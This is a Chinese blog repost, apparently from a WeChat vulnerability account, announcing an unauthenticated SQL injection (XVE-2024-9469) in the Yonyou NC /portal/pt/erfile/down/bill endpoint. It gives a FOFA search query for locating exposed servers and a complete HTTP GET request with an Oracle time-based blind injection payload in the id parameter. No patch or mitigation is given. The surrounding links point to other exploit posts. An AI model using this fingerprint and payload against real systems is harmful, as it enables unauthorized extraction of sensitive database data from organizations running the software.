用友NC down/bill存在SQL注入漏洞(XVE-2024-9469)

admin

104395
文章

87
评论

2024年5月3日00:11:36评论43 views字数 526阅读1分45秒阅读模式

漏洞描述

用友NC /portal/pt/erfile/down/bill存在SQL注入漏洞，未经身份验证的攻击者可通过该漏洞获取数据库敏感信息。

资产测绘

FOFA：icon_hash="1085941792" && body="/logo/images/logo.gif"

漏洞复现

GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

原文始发于微信公众号（漏洞文库）：【漏洞复现】用友NC down/bill存在SQL注入漏洞(XVE-2024-9469)

左青龙
微信扫一扫

右白虎
微信扫一扫

用友NC down/bill存在SQL注入漏洞(XVE-2024-9469)

漏洞描述

漏洞复现

【漏洞复现】佳会视频会议attachment接口处存在任意文件读取漏洞

Apache-OFBiz-目录遍历漏洞利用【附Poc】

漏洞预警 | 金和OA C6 任意文件读取漏洞

漏洞预警 | 用友U8Cloud XXE漏洞

漏洞预警 | 福建科立讯通信指挥调度管理平台SQL注入漏洞

漏洞复现 | 大华ICC智能物联综合管理平台fastjson漏洞【附poc】

【0day】全智能停车视频收费系统WebServiceToAndroid存在任意文件上传漏洞

飞鱼星企业级智能上网行为管理系统 send_order.cgi 任意命令执行

亿赛通电子文档安全管理系统-File Read

(0day)WVP-GB28181摄像头管理平台存在敏感信息泄露

发表评论

在线咨询

微信